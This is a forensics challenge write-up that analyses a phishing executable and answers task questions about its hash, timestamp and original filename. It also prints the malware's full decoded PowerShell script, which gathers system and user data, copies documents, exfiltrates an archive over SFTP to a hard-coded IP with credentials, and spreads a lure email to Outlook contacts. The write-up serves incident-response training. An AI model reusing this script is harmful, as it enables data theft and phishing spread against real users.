Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.
The sherlock archive contains a single file, Superstar_MemberCard.tiff.exe.
Tasks
To accurately reference and identify the suspicious binary, please provide its SHA256 hash.
When was the binary file originally created, according to its metadata (UTC)?
This can be found using a PE analysis tool like pestudio.
The compiler timestamp for the binary is 2024-03-13 10:38:06.
Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?
The sizes of the various sections of the binary are listed under sections in pestudio. Code is stored in the .text section, which in this case is 38400 bytes long.
It appears that the binary may have undergone a file conversion process. Could you determine its original filename?
This is also captured in pestudio, though the filename is somewhat hidden:
The original filename was newILY.ps1.
Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.
The obfuscated code is a base64 encoded blob. As such, it's listed in the strings view in pestudio:
The offset is at 0x2C74.
The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?
Base64.
What is the specific cmdlet utilized that was used to initiate file downloads?
The embedded script can be extracted from the binary by navigating to the resources view in pestudio, right-clicking on the first line containing the embedded script's name, then instance → dump to file.
The main logic of the script is hidden inside the base64 encoded blob. Following it is a short stub for decoding and launching the actual script:
The snippet above calls [array]::Reverse($enC) to reverse the contents of the blob before decoding it. Repeating the process using CyberChef (Reverse + From Base64), produces the following script:
$hostname=$env:COMPUTERNAME$currentUser=$env:USERNAME$url="http://44.206.187.144:9000/Superstar_MemberCard.tiff"$img="C:\users\$currentUser\Downloads\Superstar_MemberCard.tiff"Invoke-WebRequest-Uri$url-OutFile$imgStart-Process$img$searchDir="C:\Users"$targetDir="C:\Users\Public\Public Files"if(-not(Test-Path-Path$targetDir-PathTypeContainer)){New-Item-ItemTypeDirectory-Path$targetDir-Force|Out-Null}$currentUser|Out-File-FilePath(Join-Path$targetDir'username.txt')-Forcenltest/dsgetdc:$env:USERDOMAIN2>$null|Out-File-FilePath(Join-Path$targetDir'DCinfo.txt')-ForceGet-WmiObject-ClassWin32_UserAccount|Out-File-FilePath(Join-Path$targetDir'localusers.txt')-Forcewmic/NAMESPACE:\\root\SecurityCenter2PATHAntiVirusProductGET/value2>$null|Out-File-FilePath(Join-Path$targetDir'AVinfo.txt')-Force$currentUserProcesses=Get-WmiObjectWin32_Process|Where-Object{try{$_.GetOwner().User-eq$currentUser}catch{$false}}$currentUserProcesses|Select-ObjectProcessName,ProcessId|Out-File-FilePath(Join-Path$targetDir'UserProcesses.txt')-Forceif(Get-Process-NameOutlook-ErrorActionSilentlyContinue){Stop-Process-NameOutlook-Force-ErrorActionSilentlyContinue}$extList="*.doc","*.docx","*.xls","*.xlsx","*.ppt","*.pptx","*.pdf","*.csv",".*oft","*.potx","*.xltx","*.dotx","*.msg","*.eml","*.pst","*.odt","*.ods","*.odp","*.odg","*.ost"$null=Get-ChildItem$searchDir-Recurse-Include$extList-Force-ErrorAction'SilentlyContinue'|ForEach-Object{$destinationPath=Join-Path$targetDir$_.Nameif($_.FullName-ne$destinationPath){Copy-Item-Path$_.FullName-Destination$destinationPath-Force}}Get-SmbShare|Out-File-FilePath(Join-Path$targetDir'Shareinfo.txt')-Forcegpresult/r |Out-File-FilePath(Join-Path$targetDir'GPinfo.txt')-Force$ProgressPreference='SilentlyContinue'$archivePath="$targetDir\$hostname.zip"Compress-Archive-Path$targetDir-DestinationPath$archivePath-Force$wZipUrl="https://us.softradar.com/static/products/winscp-portable/distr/0/winscp-portable_softradar-com.zip"$wZipFile="$targetDir\WinSCP.zip"$wExtractPath="C:\Users\Public\HelpDesk-Tools"Invoke-WebRequest-UserAgent"Wget"-Uri$wZipUrl-OutFile$wZipFile-UseBasicParsingExpand-Archive-Path$wZipFile-DestinationPath$wExtractPath-Force$wExePath="$wExtractPath\WinSCP.com"$sPath="$wExtractPath\maintenanceScript.txt"@"open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*put `"$archivePath`"closeexit"@|Out-File-FilePath$sPath-ForceStart-Process-FilePath$wExePath-ArgumentList"/script=`"$sPath`""-Wait-NoNewWindow$outlookPath=Get-ChildItem-Path"C:\Program Files\Microsoft Office"-Filter"OUTLOOK.EXE"-Recurse|Select-Object-First1-ExpandPropertyFullName$htmlBody=@"<!DOCTYPE html><html><head><style> body { font-family: Calibri, sans-serif; }</style></head><body><p>Hey, </p> <p> Hope you're doing great when you see this. I'm reaching out because there's something I've been wanting to share with you. You know that feeling when you've been admiring someone from afar, but hesitated to take the next step? That's been me lately, but I've decided it's time to change that.</p><p>In a world where we often rush through everything, I believe in the beauty of taking things slow, cherishing each moment like a scene from a timeless tale. So, if you're open to it, I'd love for us to meet up after hours.</p><p>I've arranged for a rendezvous at a private membership club, where we can enjoy a bit of privacy and exclusivity. I've attached the map for your convenience. </p><p>To gain entry, you'll need a digital membership card for entry, accessible <a href='http://44.206.187.144:9000/Superstar_MemberCard.tiff.exe'>here</a>. Just a friendly heads up, there's a time limit before you can download it, so it's best to grab it sooner rather than waiting too long.</p><p>Counting on seeing you there later.</p></body></html>"@if($outlookPath){Start-Process-FilePath$outlookPath$outlook=New-Object-ComObjectOutlook.Application$namespace=$outlook.GetNamespace("MAPI")$contactsFolder=$namespace.GetDefaultFolder(10)$csvFilePath="$targetDir\Contacts.csv"$contactsFolder.Items|ForEach-Object{$_.GetInspector|ForEach-Object{$_.Close(0)}$props=@{'Full Name'=$_.FullName'Email Address'=$_.Email1Address}New-ObjectPSObject-Property$props}|Export-Csv-Path$csvFilePath-NoTypeInformation$contacts=Import-Csv-Path$csvFilePath$mailItem=$outlook.CreateItem(0)$mailItem.Subject="Fingers crossed you'll notice.."$mailItem.HtmlBody=$htmlBody$mailItem.Attachments.Add($img)>$null$mailItem.BodyFormat=2foreach($contactin$contacts){$bccRecipient=$mailItem.Recipients.Add($contact."Email Address")$bccRecipient.Type =[Microsoft.Office.Interop.Outlook.OlMailRecipientType]::olBCC}$mailItem.Recipients.ResolveAll()>$null$mailItem.Send()}Remove-Item-Path$wExtractPath-Recurse-ForceRemove-Item-Path$targetDir-Recurse-Force
Lines with answers to the next questions are hightlighted in the PowerShell code above.
The downloads were initiated using the cmdlet Invoke-WebRequest (line 6).
Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.
There are two IP addresses in the script, 44.206.187.144 (line 3) and 35.169.66.138 (line 64).
The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?
The staging directory is defined as $targetDir on line 10:
